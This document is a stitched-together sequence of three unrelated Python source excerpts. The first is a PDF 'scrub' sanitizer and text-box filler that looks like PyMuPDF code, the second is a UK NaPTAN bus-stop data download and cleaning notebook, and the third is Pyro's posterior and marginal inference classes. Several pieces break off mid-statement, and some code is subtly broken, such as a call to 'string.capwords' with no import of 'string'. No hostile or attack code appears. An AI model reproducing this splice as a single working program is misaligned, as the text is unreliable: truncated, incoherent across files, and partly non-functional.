shape.commit() # append new contents object
return True
# ------------------------------------------------------------------------------
# Remove potentially sensitive data from a PDF. Corresponds to the Adobe
# Acrobat 'sanitize' function
# ------------------------------------------------------------------------------
def scrub(
    doc: Document,
    attached_files: bool = True,
    clean_pages: bool = True,
    embedded_files: bool = True,
    hidden_text: bool = True,
    javascript: bool = True,
    metadata: bool = True,
    redactions: bool = True,
    redact_images: int = 0,
    remove_links: bool = True,
    reset_fields: bool = True,
    reset_responses: bool = True,
    xml_metadata: bool = True,
) -> None:
    """Remove potentially sensitive data from a PDF.

    Corresponds to the Adobe Acrobat 'sanitize' function.

    Args:
        doc: the PDF document, modified in place.
        attached_files: blank out content of file-attachment annotations.
        clean_pages: sanitize page /Contents. Required for hidden_text and
            redactions, which are switched off when this is False.
        embedded_files: delete embedded files.
        hidden_text: remove text written in invisible render mode (3 Tr).
        javascript: replace JavaScript actions with empty ones.
        metadata: clear the standard document metadata.
        redactions: apply redaction annotations found on pages.
        redact_images: image handling value passed to apply_redactions().
        remove_links: delete every link on every page.
        reset_fields: reset all form fields (widgets).
        reset_responses: delete response annotations.
        xml_metadata: remove XML (XMP) metadata.

    Raises:
        ValueError: if doc is not a PDF, or is closed / encrypted.
    """

    def remove_hidden(cont_lines):
        """Remove hidden text from a PDF page.

        Args:
            cont_lines: list of lines with /Contents content. Should have status
                from after page.cleanContents().
        Returns:
            List of /Contents lines from which hidden text has been removed,
            or None if nothing was removed.
        Notes:
            The input must have been created after the page's /Contents object(s)
            have been cleaned with page.cleanContents(). This ensures a standard
            formatting: one command per line, single spaces between operators.
            This allows for drastic simplification of this code.
        """
        out_lines = []  # will return this
        in_text = False  # indicate if within BT/ET object
        suppress = False  # indicate text suppression active
        make_return = False
        for line in cont_lines:
            if line == b"BT":  # start of text object
                in_text = True  # switch on
                out_lines.append(line)  # output it
                continue
            if line == b"ET":  # end of text object
                in_text = False  # switch off
                out_lines.append(line)  # output it
                continue
            if line == b"3 Tr":  # text suppression operator
                suppress = True  # switch on
                make_return = True
                continue
            # Any other render-mode change switches suppression off.
            # BUGFIX: 'line[0]' yields an int in Python 3, so the previous
            # comparison 'line[0] != b"3"' was always True; compare via
            # startswith() instead.
            if line.endswith(b"Tr") and not line.startswith(b"3"):
                suppress = False  # text rendering changed
                out_lines.append(line)
                continue
            if line == b"Q":  # unstack command also switches off
                suppress = False
                out_lines.append(line)
                continue
            if suppress and in_text:  # suppress hidden lines
                continue
            out_lines.append(line)
        if make_return:
            return out_lines
        else:
            return None

    if not doc.isPDF:  # only works for PDF
        raise ValueError("not a PDF")
    if doc.isEncrypted or doc.isClosed:
        raise ValueError("closed or encrypted doc")
    if clean_pages is False:
        # hidden text removal and redactions depend on cleaned /Contents
        hidden_text = False
        redactions = False
    if metadata:
        doc.setMetadata({})  # remove standard metadata
    for page in doc:
        if reset_fields:
            # reset form fields (widgets)
            for widget in page.widgets():
                widget.reset()
                widget.update()
        if remove_links:
            links = page.getLinks()  # list of all links on page
            for link in links:  # remove all links
                page.deleteLink(link)
        found_redacts = False
        for annot in page.annots():
            if annot.type[0] == PDF_ANNOT_FILE_ATTACHMENT and attached_files:
                annot.fileUpd(buffer=b" ")  # set file content to empty
            if reset_responses:
                annot.delete_responses()
            if annot.type[0] == PDF_ANNOT_REDACT:
                found_redacts = True
        if redactions and found_redacts:
            page.apply_redactions(images=redact_images)
        if not (clean_pages or hidden_text):
            continue  # done with the page
        page.clean_contents()
        if not page.get_contents():
            continue  # page has no /Contents at all
        if hidden_text:
            xref = page.get_contents()[0]  # only one b/o cleaning!
            cont = doc.xref_stream(xref)
            cont_lines = remove_hidden(cont.splitlines())  # remove hidden text
            if cont_lines:  # something was actually removed
                cont = b"\n".join(cont_lines)
                doc.update_stream(xref, cont)  # rewrite the page /Contents
    # pages are scrubbed, now perform document-wide scrubbing
    # remove embedded files
    if embedded_files:
        for name in doc.embeddedFileNames():
            doc.embeddedFileDel(name)
    if xml_metadata:
        doc.del_xml_metadata()
    # only walk the xref table if there is something left to look for
    if not (xml_metadata or javascript):
        xref_limit = 0
    else:
        xref_limit = doc.xrefLength()
    for xref in range(1, xref_limit):
        obj = doc.xref_object(xref)  # get object definition source
        # note: this string is formatted in a standard way by MuPDF.
        if javascript and "/S /JavaScript" in obj:  # a /JavaScript action object?
            obj = "<</S/JavaScript/JS()>>"  # replace with a null JavaScript
            doc.update_object(xref, obj)  # update this object
            continue  # no further handling
        if not xml_metadata or "/Metadata" not in obj:
            continue
        if "/Type /Metadata" in obj:  # delete any metadata object directly
            doc.update_stream(xref, b"deleted")
            doc.update_object(xref, "<<>>")
            continue
        # otherwise drop only the /Metadata key from the object definition
        obj_lines = obj.splitlines()
        new_lines = []  # will receive remaining obj definition lines
        found = False  # assume /Metadata not found
        for line in obj_lines:
            line = line.strip()
            if not line.startswith("/Metadata "):
                new_lines.append(line)  # keep this line
            else:  # drop this line
                found = True
        if found:  # if removed /Metadata key, update object definition
            # use the snake-case alias for consistency with the rest of
            # this function (doc.update_object above).
            doc.update_object(xref, "\n".join(new_lines))
def fillTextbox(
writer: TextWriter,
rect: rect_like,
text: typing.Union[str, list],
pos: point_like = None,
font: typing.Optional[Font] = None,
fontsize: float = 11,
lineheight: OptFloat = None,
align: int = 0,
warn: bool = True,
) -> tuple:
"""Fill a rectangle with text.
Args:
writer: TextWriter object (= "self")
text: string or list/tuple of strings.
rect: rect-like to receive the text.
pos: point-like start position of first word.
font: Font object (default Font('helv')).
fontsize: the fontsize.
lineheight: overwrite the font property
align: (int) 0 = left, 1 = center, 2 = right, 3 = justify
warn: (bool) just warn on text overflow, else raise exception.
"""
textlen = lambda x: font.text_length(x, fontsize) # just for abbreviation
rect = Rect(rect)
if rect.isEmpty or rect.isInfinite:
raise ValueError("fill rect must be finite and not empty.")
if type(font) is not Font:
font = Font("helv")
asc = font.ascender
dsc = font.descender
if not lineheight:
if asc - dsc <= 1:
lheight = 1.2
else:
lheight = asc - dsc
else:
lheight = lineheight
tolerance = fontsize * 0.25
width = rect.width - tolerance # available horizontal space
len_space = textlen(" ") # width of space character
# starting point of the text
if pos is not None:
pos = Point(pos)
if not pos in rect:
raise ValueError("'pos' must be inside 'rect'")
else: # default is just below rect top-left
pos = rect.tl + (tolerance, fontsize * asc)
# calculate displacement factor for alignment
if align == TEXT_ALIGN_CENTER:
factor = 0.5
elif align == TEXT_ALIGN_RIGHT:
factor = 1.0
else:
factor = 0
# split in lines if just a string was given
if type(text) not in (tuple, list):
text = text.splitlines()
text = " \n".join(text).split(" ") # split in words, preserve line breaks
# compute lists of words and word lengths
words = [] # recomputed list of words
len_words = [] # corresponding lengths
for word in text:
# fill the lists of words and their lengths
# this splits words longer than width into chunks, which each are
# treated as words themselves.
if word.startswith("\n"):
len_word = textlen(word[1:])
else:
len_word = textlen(word)
if len_word <= width: # simple case: word not longer than a line
words.append(word)
len_words.append(len_word)
continue
# deal with an extra long word
w = word[0] # start with 1st char
l = textlen(w) # and its length
for i in | |
# %%
import os
import sys
from collections import Counter
from datetime import datetime, timedelta
from glob import glob
from pathlib import Path
from zipfile import ZipFile
# data wrangling
import geopandas as gpd
import pandas as pd
import numpy as np
import requests
from urllib.error import HTTPError
# data manipulation
from convertbng.util import convert_lonlat
# logging
from shapely.geometry import Point
import con_checks as con
import geo_checks as geo
# %%
# Date stamp (YYYY_MM_DD) used to name downloaded/extracted Naptan data sets.
timestr = datetime.now().strftime("%Y_%m_%d")
# Project-relative source and data folders.
src_home = Path('./OpenNaPTAN/src/')
data_home = Path('./OpenNaPTAN/data/')
# Current working directory as a plain string.
base_path = (f'{os.getcwd()}')
# The user's Downloads folder — where the Naptan zip archive is saved.
download_home = str(os.path.join(Path.home(), "Downloads"))
# DfT Naptan download endpoints (csv and xml variants).
naptan_csv_url = 'http://naptan.app.dft.gov.uk/DataRequest/Naptan.ashx?format=csv'
naptan_xml_url = 'http://naptan.app.dft.gov.uk/Datarequest/naptan.ashx'
# config options
pd.set_option('display.max_columns', None)
pd.set_option('display.max_rows', 5)
# %%
def intersect_list_to_masks(df, col_name, value_list):
    """Filter a dataframe down to rows whose column value matches a list.

    Behaves like an inner join against ``value_list``: every entry of the
    named column is intersected (via numpy) with the given list, and only
    rows with at least one match are kept.

    Arguments:
        df -- the dataframe (or geodataframe) to filter.
        col_name {[str]} -- [the pandas column name, as a string]
        value_list {[list]} -- [the list of strings to filter the dataframe.]

    Returns:
        [gdf] -- [a filtered gdf, with only the found list values within. ]
    """
    # numpy's 1-d set intersection matches an entire list of strings
    # against each cell in one expression.
    keep = df[col_name].apply(
        lambda cell: np.intersect1d(cell, value_list).size > 0)
    return df[keep]
# %%
def downloads_naptan_data(format='csv', local_authority_code=''):
    """Download the full Naptan csv archive from app.dft.gov.uk.

    The archive is saved to the user's Downloads folder under today's
    date stamp; nothing is downloaded if that file already exists.
    Per-authority and xml downloads are recognised but not implemented.

    Args:
        format (str, optional): requested data format. Defaults to 'csv'.
        local_authority_code (str, optional): restrict the download to a
            single local authority (unsupported). Defaults to ''.

    Raises:
        NotImplementedError: for per-authority or xml download requests.
        ValueError: re-raised if raised during the download.
    """
    # renamed from 'dir' to avoid shadowing the builtin.
    download_dir = str(os.path.join(Path.home(), "Downloads"))
    file = Path(f'{download_home}/{timestr}_Naptan_Data.zip')
    try:
        # let's check if the naptan zip file exists.
        if not file.exists():
            print('Downloading the entire Naptan Dataset.')
            url = 'http://naptan.app.dft.gov.uk/DataRequest/Naptan.ashx?format=csv'
            response = requests.get(url)
            # 'file' is already an absolute path, so the join resolves to it.
            with open(os.path.join(download_dir, file), 'wb') as f:
                f.write(response.content)
            response.close()
        elif local_authority_code.isdigit():
            # per-authority download is not supported by this client yet.
            raise NotImplementedError
        elif format == 'xml':
            # xml download is not supported by this client yet.
            raise NotImplementedError
        else:
            return (f'Naptan Data has been for {timestr} has been downloaded.')
    except ConnectionError as ce:
        sys.exit(f' {ce} No internet connection was found.')
    except ConnectionRefusedError as cre:
        sys.exit(f'{cre} This system is not allowed to access the Naptan Site.')
    except HTTPError as httperror:
        sys.exit(f'{httperror} the Naptan download server is unavailable.')
    except ValueError as ve:
        # NOTE: the original had an unreachable sys.exit() after this
        # re-raise; it has been removed.
        raise ve
# %%
def extract_naptan_files():
    """Unpack the downloaded Naptan zip archive into the local data folder.

    Does nothing if the expected archive is missing or is not a ``.zip``.
    """
    zip_file = Path(f'{download_home}/{timestr}_Naptan_Data.zip')
    destination = Path(f'{os.getcwd()}/data/{timestr}_Naptan_Data')
    try:
        # silently skip when there is no valid archive to unpack
        if not (zip_file.is_file() and zip_file.suffix == '.zip'):
            return
        with ZipFile(zip_file, "r") as archive:
            # Extract all the contents of zip file in the working directory
            archive.extractall(destination)
            print(f'Extracting all {destination} files in archive.')
    except FileNotFoundError:
        sys.exit('Naptan archive file not found.')
    except FileExistsError:
        sys.exit('File already exists')
    except Exception as e:
        sys.exit(e)
# %%
def check_naptan_files():
    """List which of the expected Naptan files exist at the data location.

    Prints one line per expected file stating whether it was found or is
    missing / has the wrong extension.
    """
    # TODO check if files are readable
    data_dir = (f'{os.getcwd()}/data/{timestr}_Naptan_Data/')
    extension = 'csv'
    expected_names = [
        'AirReferences',
        'AlternativeDescriptors',
        'AreaHierarchy',
        'CoachReferences',
        'FerryReferences',
        'Flexible',
        'HailRide',
        'LocalityMainAccessPoints',
        'MetroReferences',
        'RailReferences',
        'StopAreas',
        'StopAvailability',
        'StopLocalities',
        'StopPlusbusZones',
        'Stops',
        'StopsInArea',
    ]
    found_names = []
    # report each expected file and, when present, where it was found
    for name in expected_names:
        candidate = Path(f'{data_dir}{name}.{extension}')
        if candidate.is_file() and candidate.exists():
            found_names.append(candidate.stem)
            print(f'{candidate.name} as a {extension} has been found.')
        else:
            print(f'The {candidate} is missing or the file extension is wrong.')
# %%
def convert_xml_to_df(xml_doc):
    """Convert an XML element tree into a pandas DataFrame for verification.

    Each ``<document>`` descendant becomes one row carrying the root
    element's attributes, the document element's own attributes, and its
    text content in a ``data`` column.

    Args:
        xml_doc: an ``xml.etree.ElementTree.Element`` (or compatible) root.

    Returns:
        pandas.DataFrame: one row per ``document`` element.
    """
    root_attrs = xml_doc.attrib
    records = []
    for node in xml_doc.iter('document'):
        # merge root attributes with this element's attributes; the original
        # built this dict but discarded it and assigned into the DataFrame
        # *class* (``doc_dict = pd.DataFrame``), which raises TypeError.
        record = root_attrs.copy()
        record.update(node.attrib)
        record['data'] = node.text
        records.append(record)
    return pd.DataFrame(records)
# %%
def file_pep8_cleaning(home, ext):
    """Rename every file with extension *ext* in *home* to Capitalised_Words
    form and record the renames in ``update_list.txt``.

    Args:
        home: the target directory, only one at once.
        ext: a file type extension including the dot (e.g. '.csv'),
            only one at once.
    """
    home = Path(home)
    os.chdir(home)
    renames = []
    for path in Path().iterdir():
        if path.is_file() and path.suffix == ext:
            stem = path.stem
            renames.append(stem)
            # capitalise each word of the stem and join with underscores
            titled = string.capwords(stem).title()
            new_stem = '_'.join(word[0].upper() + word[1:]
                                for word in titled.split(' '))
            # keep the original extension; the old code dropped it, so
            # renamed files no longer matched *ext*
            target = Path(home, new_stem).with_suffix(ext)
            renames.append(str(target))
            path.rename(target)
    # the old code passed a tuple to open() and wrote a list directly,
    # both of which raise TypeError; build a real path and a text payload
    with open(Path(home, 'update_list.txt'), 'w+') as log_file:
        log_file.write('\n'.join(renames))
# %%
def convert_to_lat_long(df):
    """Convert the Easting/Northing grid columns of *df* into Longitude and
    Latitude columns, then drop the grid columns.

    Arguments:
        df -- dataframe holding 'Easting' and 'Northing' columns.

    Returns:
        the dataframe with 'Longitude'/'Latitude' added and
        'Easting'/'Northing' removed.
    """
    eastings = np.array(df.Easting)
    northings = np.array(df.Northing)
    converted = convert_lonlat(eastings, northings)
    df['Longitude'] = converted[0]
    df['Latitude'] = converted[1]
    # the grid reference columns are redundant once converted
    df = df.drop(columns=['Easting', 'Northing'], axis=1)
    return df
# %%
def deactivated_nodes(df):
    """Return only active, pending or new nodes, plus deleted stops modified
    within the last 3 years (kept for representative sampling).

    Older deleted nodes are removed. This function does no error reporting;
    it is purely a data-cleaning step.

    Arguments:
        df {[geopanda dataframe]} -- [The Naptan master dataframe.]

    Returns:
        dataframe -- df without deleted nodes older than ~3 years.
    """
    # Note: the original wrapped this in try/except FileNotFoundError that
    # only re-raised (a no-op around pure dataframe operations) and had an
    # unreachable sys.exit after the raise; both removed.
    exp_date = datetime.now() - timedelta(days=365 * 3)
    # keep everything except deleted stops older than the cut-off
    mask = ~((df['Status'] == 'del') &
             (df['ModificationDateTime'] <= exp_date))
    active_nodes = df[mask]
    # TODO needs to be integrated with reporting function.
    # inactive_nodes = df[~mask]
    # report.nodes_error_reporting('Inactive Nodes',
    #                              inactive_nodes)
    return active_nodes
# %%
def calculate_naptan_geometry(df):
    """Take a dataframe and return a GeoDataFrame with a geometry column
    calculated from the Longitude/Latitude columns (EPSG:4326).

    Returns:
        geopandas.GeoDataFrame on success, or None (after printing a
        message) if the coordinates cannot be converted.
    """
    try:
        geom_list = [Point(lon, lat) for lon, lat in zip(df["Longitude"],
                                                         df["Latitude"])]
        return gpd.GeoDataFrame(df,
                                geometry=geom_list,
                                crs={"init": "EPSG:4326"})
    except ValueError:
        # NOTE(review): the original try/except/else's ``else`` clause was
        # unreachable (the try block always returns or raises); the failure
        # path now returns None explicitly instead of falling through.
        print('Value Error could not be converted.')
        return None
# %%
def get_centroid_naptan_area(df):
    """Determine where a folium map should be centred when generating an
    ipython view.

    Arguments:
        df -- dataframe with 'Latitude' and 'Longitude' columns.

    Returns:
        (cen_x, cen_y) -- mean latitude and mean longitude, a point
        representative of all the nodes in the area.
    """
    # The original read the row count from a 'Geometry' column, which
    # geopandas actually names 'geometry' (and which sibling code renames
    # away) -- the frame's own length is what is meant.
    length = len(df)
    cen_x = np.sum(df['Latitude']) / length
    cen_y = np.sum(df['Longitude']) / length
    return cen_x, cen_y
# %%
def naptan_gazette_districts():
    """Load the district codes from the gazette (nptgcsv) files.

    Returns:
        dataframe of AdminAreaCode, DistrictCode and DistrictName.
    """
    wanted_columns = ['AdminAreaCode', 'DistrictCode', 'DistrictName']
    return pd.read_csv(f'{os.getcwd()}/nptgcsv/Districts.csv',
                       encoding='iso-8859-1',
                       usecols=wanted_columns)
# %%
def naptan_gazette_region():
    """Load the region codes from the gazette (nptgcsv) files.

    Returns:
        dataframe of RegionName and RegionCode.
    """
    wanted_columns = ['RegionName', 'RegionCode']
    return pd.read_csv(f'{os.getcwd()}/nptgcsv/Regions.csv',
                       encoding='iso-8859-1',
                       usecols=wanted_columns)
# %%
def naptan_gazette_admin_area_codes():
    """Load the admin area codes from the gazette (nptgcsv) files, used for
    linking the admin area codes with the nodes data.

    Returns:
        dataframe of admin area codes, with 'AdminAreaCode' cast to string
        ready for joining against the nodes data.
    """
    wanted_columns = ['AdministrativeAreaCode', 'AtcoAreaCode',
                      'AreaName', 'ShortName', 'RegionCode']
    area_codes = pd.read_csv(f'{os.getcwd()}/nptgcsv/AdminAreas.csv',
                             encoding='iso-8859-1',
                             usecols=wanted_columns)
    # shorten the column name to match the naming used elsewhere
    area_codes = area_codes.rename(
        columns={'AdministrativeAreaCode': 'AdminAreaCode'})
    area_codes['AdminAreaCode'] = area_codes['AdminAreaCode'].astype(str)
    return area_codes
# %%
def naptan_gazette_localities():
    """Return the gazette locality data, prepared for joining with the
    stops data.

    Reads Localities.csv from the nptgcsv folder, normalises the admin
    area code column, converts easting/northing to longitude/latitude,
    adds a geometry column, and prefixes positional columns with
    ``Gazette_`` to avoid clashing with node columns.
    """
    cols = ['NptgLocalityCode', 'LocalityName', 'AdministrativeAreaCode',
            'QualifierName', 'NptgDistrictCode', 'SourceLocalityType',
            'GridType', 'Easting', 'Northing']
    gaz_locs = pd.read_csv(f'{os.getcwd()}/nptgcsv/Localities.csv',
                           encoding='iso-8859-1',
                           usecols=cols)
    # align the column name and dtype with the nodes data for joining
    gaz_locs = gaz_locs.rename(columns={'AdministrativeAreaCode': 'AdminAreaCode'})
    gaz_locs['AdminAreaCode'] = gaz_locs['AdminAreaCode'].astype(str)
    # adds Longitude/Latitude, then a point geometry column
    gaz_locs = convert_to_lat_long(gaz_locs)
    gaz_locs = calculate_naptan_geometry(gaz_locs)
    # NOTE(review): the 'Geometry' key below assumes a capitalised column,
    # but geopandas names its geometry column 'geometry' -- confirm this
    # rename actually fires; identity renames here are no-ops.
    gaz_locs.rename(columns={'NptgLocalityCode': 'NptgLocalityCode',
                             'LocalityName': 'LocalityName',
                             'AdminAreaCode': 'AdminCode',
                             'QualifierName': 'QualifierName',
                             'NptgDistrictCode': 'NptgDistrictCode',
                             'SourceLocalityType': 'SourceLocalityType',
                             'GridType': 'NptgGridType',
                             'Longitude': 'Gazette_Longitude',
                             'Latitude': 'Gazette_Latitude',
                             'Geometry': 'Gazette_geometry',
                             }, inplace=True)
    return gaz_locs
# %%
def map_gazette_data_to_nodes(df, gazette_data, gazette_column):
"""[summary]maps the given gazette reference data and column to the naptan
nodes data.
Arguments:
df {[type]} -- [the naptan dataframe]
gazette_data {[gazette reference data]} -- []
gazette_column {[pandas series column]} -- [description]
Raises:
NotImplemented: [description]
Returns:
[type] -- [description]
"""
# capture the | |
# <reponame>ruohoruotsi/pyro
from __future__ import absolute_import, division, print_function
import numbers
from abc import ABCMeta, abstractmethod
from collections import OrderedDict, defaultdict
import torch
from six import add_metaclass
import pyro.poutine as poutine
from pyro.distributions import Categorical, Empirical
from pyro.ops.stats import waic
from .util import site_is_subsample
class EmpiricalMarginal(Empirical):
    """
    Marginal distribution over a single site (or multiple, provided they have the same
    shape) from the ``TracePosterior``'s model.

    .. note:: If multiple sites are specified, they must have the same tensor shape.
        Samples from each site will be stacked and stored within a single tensor. See
        :class:`~pyro.distributions.Empirical`. To hold the marginal distribution of sites
        having different shapes, use :class:`~pyro.infer.abstract_infer.Marginals` instead.

    :param TracePosterior trace_posterior: a ``TracePosterior`` instance representing
        a Monte Carlo posterior.
    :param list sites: optional list of sites for which we need to generate
        the marginal distribution.
    """
    def __init__(self, trace_posterior, sites=None, validate_args=None):
        """Collect the values of ``sites`` from ``trace_posterior`` and build
        the underlying Empirical distribution from them."""
        assert isinstance(trace_posterior, TracePosterior), \
            "trace_dist must be trace posterior distribution object"
        # default to the model's return value when no site is given
        if sites is None:
            sites = "_RETURN"
        # samples/weights are buffered per chain id until construction
        self._num_chains = 1
        self._samples_buffer = defaultdict(list)
        self._weights_buffer = defaultdict(list)
        self._populate_traces(trace_posterior, sites)
        samples, weights = self._get_samples_and_weights()
        super(EmpiricalMarginal, self).__init__(samples,
                                                weights,
                                                validate_args=validate_args)

    def _get_samples_and_weights(self):
        """
        Appends values collected in the samples/weights buffers to their
        corresponding tensors.
        """
        num_chains = len(self._samples_buffer)
        samples_by_chain = []
        weights_by_chain = []
        for i in range(num_chains):
            samples = torch.stack(self._samples_buffer[i], dim=0)
            samples_by_chain.append(samples)
            # weights must be floating point; fall back to float32 when the
            # samples themselves are integer-typed
            weights_dtype = samples.dtype if samples.dtype.is_floating_point else torch.float32
            weights = torch.as_tensor(self._weights_buffer[i], device=samples.device, dtype=weights_dtype)
            weights_by_chain.append(weights)
        # single chain: return the buffers directly; multiple chains:
        # stack along a leading chain dimension
        if len(samples_by_chain) == 1:
            return samples_by_chain[0], weights_by_chain[0]
        else:
            return torch.stack(samples_by_chain, dim=0), torch.stack(weights_by_chain, dim=0)

    def _add_sample(self, value, log_weight=None, chain_id=0):
        """
        Adds a new data point to the sample. The values in successive calls to
        ``add`` must have the same tensor shape and size. Optionally, an
        importance weight can be specified via ``log_weight`` or ``weight``
        (default value of `1` is used if not specified).

        :param torch.Tensor value: tensor to add to the sample.
        :param torch.Tensor log_weight: log weight (optional) corresponding
            to the sample.
        :param int chain_id: chain id that generated the sample (optional).
            Note that if this argument is provided, ``chain_id`` must lie
            in ``[0, num_chains - 1]``, and there must be equal number
            of samples per chain.
        """
        # Apply default weight of 1.0 (log weight 0).
        if log_weight is None:
            log_weight = 0.0
        if self._validate_args and not isinstance(log_weight, numbers.Number) and log_weight.dim() > 0:
            raise ValueError("``weight.dim() > 0``, but weight should be a scalar.")
        # Append to the buffer list for this chain
        self._samples_buffer[chain_id].append(value)
        self._weights_buffer[chain_id].append(log_weight)
        self._num_chains = max(self._num_chains, chain_id + 1)

    def _populate_traces(self, trace_posterior, sites):
        """Extract the value of ``sites`` from every collected trace and
        buffer it together with its log weight and chain id."""
        assert isinstance(sites, (list, str))
        for tr, log_weight, chain_id in zip(trace_posterior.exec_traces,
                                            trace_posterior.log_weights,
                                            trace_posterior.chain_ids):
            # single site: take its value directly; list of sites: stack
            # their (same-shaped) values into one tensor
            value = tr.nodes[sites]["value"] if isinstance(sites, str) else \
                torch.stack([tr.nodes[site]["value"] for site in sites], 0)
            self._add_sample(value, log_weight=log_weight, chain_id=chain_id)
class Marginals(object):
    """
    Holds the marginal distribution over one or more sites from the ``TracePosterior``'s
    model. This is a convenience container class, which can be extended by ``TracePosterior``
    subclasses. e.g. for implementing diagnostics.

    :param TracePosterior trace_posterior: a TracePosterior instance representing
        a Monte Carlo posterior.
    :param list sites: optional list of sites for which we need to generate
        the marginal distribution.
    """
    def __init__(self, trace_posterior, sites=None, validate_args=None):
        assert isinstance(trace_posterior, TracePosterior), \
            "trace_dist must be trace posterior distribution object"
        # normalize ``sites`` to a list of site names
        if sites is None:
            sites = ["_RETURN"]
        elif isinstance(sites, str):
            sites = [sites]
        else:
            assert isinstance(sites, list)
        self.sites = sites
        self._marginals = OrderedDict()
        self._diagnostics = OrderedDict()
        self._trace_posterior = trace_posterior
        self._populate_traces(trace_posterior, validate_args)

    def _populate_traces(self, trace_posterior, validate):
        """Build one :class:`EmpiricalMarginal` per requested site."""
        # Keep the OrderedDict type declared in __init__ and documented on
        # ``empirical``; the previous plain-dict comprehension silently
        # replaced the declared container type.
        self._marginals = OrderedDict(
            (site, EmpiricalMarginal(trace_posterior, site, validate))
            for site in self.sites)

    def support(self, flatten=False):
        """
        Gets support of this marginal distribution.

        :param bool flatten: A flag to decide if we want to flatten `batch_shape`
            when the marginal distribution is collected from the posterior with
            ``num_chains > 1``. Defaults to False.
        :returns: a dict with keys are sites' names and values are sites' supports.
        :rtype: :class:`OrderedDict`
        """
        support = OrderedDict([(site, value.enumerate_support())
                               for site, value in self._marginals.items()])
        # with multiple chains, optionally merge the chain dimension into
        # the sample dimension
        if self._trace_posterior.num_chains > 1 and flatten:
            for site, samples in support.items():
                shape = samples.size()
                flattened_shape = torch.Size((shape[0] * shape[1],)) + shape[2:]
                support[site] = samples.reshape(flattened_shape)
        return support

    @property
    def empirical(self):
        """
        A dictionary of sites' names and their corresponding :class:`EmpiricalMarginal`
        distribution.

        :type: :class:`OrderedDict`
        """
        return self._marginals
@add_metaclass(ABCMeta)
class TracePosterior(object):
    """
    Abstract TracePosterior object from which posterior inference algorithms inherit.
    When run, collects a bag of execution traces from the approximate posterior.
    This is designed to be used by other utility classes like `EmpiricalMarginal`,
    that need access to the collected execution traces.

    :param int num_chains: number of chains whose traces are collected.
    """
    def __init__(self, num_chains=1):
        self.num_chains = num_chains
        self._reset()

    def _reset(self):
        """Clear all collected traces, weights and per-chain bookkeeping."""
        self.log_weights = []
        self.exec_traces = []
        self.chain_ids = []  # chain id corresponding to the sample
        self._idx_by_chain = [[] for _ in range(self.num_chains)]  # indexes of samples by chain id
        self._categorical = None  # built by run(); used by __call__ to sample traces

    def marginal(self, sites=None):
        """
        Generates the marginal distribution of this posterior.

        :param list sites: optional list of sites for which we need to generate
            the marginal distribution.
        :returns: A :class:`Marginals` class instance.
        :rtype: :class:`Marginals`
        """
        return Marginals(self, sites)

    @abstractmethod
    def _traces(self, *args, **kwargs):
        """
        Abstract method implemented by classes that inherit from `TracePosterior`.

        :return: Generator over ``(exec_trace, weight)`` or
            ``(exec_trace, weight, chain_id)``.
        """
        raise NotImplementedError("Inference algorithm must implement ``_traces``.")

    def __call__(self, *args, **kwargs):
        """Draw one stored trace (weighted by ``log_weights``), with its
        observation nodes removed."""
        # To ensure deterministic sampling in the presence of multiple chains,
        # we get the index from ``idxs_by_chain`` instead of sampling from
        # the marginal directly.
        random_idx = self._categorical.sample().item()
        chain_idx, sample_idx = random_idx % self.num_chains, random_idx // self.num_chains
        sample_idx = self._idx_by_chain[chain_idx][sample_idx]
        trace = self.exec_traces[sample_idx].copy()
        # drop observed sites so the returned trace holds only latent choices
        for name in trace.observation_nodes:
            trace.remove_node(name)
        return trace

    def run(self, *args, **kwargs):
        """
        Calls `self._traces` to populate execution traces from a stochastic
        Pyro model.

        :param args: optional args taken by `self._traces`.
        :param kwargs: optional keywords args taken by `self._traces`.
        """
        self._reset()
        # block Pyro handlers so collecting traces is not itself recorded
        with poutine.block():
            for i, vals in enumerate(self._traces(*args, **kwargs)):
                # _traces yields (trace, weight) or (trace, weight, chain_id)
                if len(vals) == 2:
                    chain_id = 0
                    tr, logit = vals
                else:
                    tr, logit, chain_id = vals
                    assert chain_id < self.num_chains
                self.exec_traces.append(tr)
                self.log_weights.append(logit)
                self.chain_ids.append(chain_id)
                self._idx_by_chain[chain_id].append(i)
        # categorical over traces, weighted by the collected log weights
        self._categorical = Categorical(logits=torch.tensor(self.log_weights))
        return self

    def information_criterion(self, pointwise=False):
        """
        Computes information criterion of the model. Currently, returns only "Widely
        Applicable/Watanabe-Akaike Information Criterion" (WAIC) and the corresponding
        effective number of parameters.

        Reference:

        [1] `Practical Bayesian model evaluation using leave-one-out cross-validation and WAIC`,
        <NAME>, <NAME>, and <NAME>

        :param bool pointwise: a flag to decide if we want to get a vectorized WAIC or not. When
            ``pointwise=False``, returns the sum.
        :returns: a dictionary containing values of WAIC and its effective number of
            parameters.
        :rtype: :class:`OrderedDict`
        """
        if not self.exec_traces:
            return {}
        obs_node = None
        log_likelihoods = []
        for trace in self.exec_traces:
            obs_nodes = trace.observation_nodes
            if len(obs_nodes) > 1:
                raise ValueError("Infomation criterion calculation only works for models "
                                 "with one observation node.")
            # every trace must observe the same single node
            if obs_node is None:
                obs_node = obs_nodes[0]
            elif obs_node != obs_nodes[0]:
                raise ValueError("Observation node has been changed, expected {} but got {}"
                                 .format(obs_node, obs_nodes[0]))
            log_likelihoods.append(trace.nodes[obs_node]["fn"]
                                   .log_prob(trace.nodes[obs_node]["value"]))
        ll = torch.stack(log_likelihoods, dim=0)
        waic_value, p_waic = waic(ll, torch.tensor(self.log_weights, device=ll.device), pointwise)
        return OrderedDict([("waic", waic_value), ("p_waic", p_waic)])
class TracePredictive(TracePosterior):
"""
Generates and holds traces from the posterior predictive distribution,
given model execution traces from the approximate posterior. This is
achieved by constraining latent sites to randomly sampled parameter
values from the model execution traces and running the model forward
to generate traces with new response ("_RETURN") sites.
:param model: arbitrary Python callable containing Pyro primitives.
:param TracePosterior posterior: trace posterior instance holding samples from the model's approximate posterior.
:param int num_samples: number of samples to generate.
:param keep_sites: The sites which should be sampled from posterior distribution (default: all)
"""
def __init__(self, model, posterior, num_samples, keep_sites=None):
self.model = model
self.posterior = posterior
self.num_samples = num_samples
self.keep_sites = keep_sites
super(TracePredictive, self).__init__()
def _traces(self, *args, **kwargs):
if not self.posterior.exec_traces:
self.posterior.run(*args, **kwargs)
data_trace = poutine.trace(self.model).get_trace(*args, **kwargs)
for _ in range(self.num_samples):
model_trace = self.posterior().copy()
self._remove_dropped_nodes(model_trace)
self._adjust_to_data(model_trace, data_trace)
resampled_trace = poutine.trace(poutine.replay(self.model, model_trace)).get_trace(*args, **kwargs)
yield (resampled_trace, 0., 0)
def _remove_dropped_nodes(self, trace):
if self.keep_sites is None:
return
for name, site in list(trace.nodes.items()):
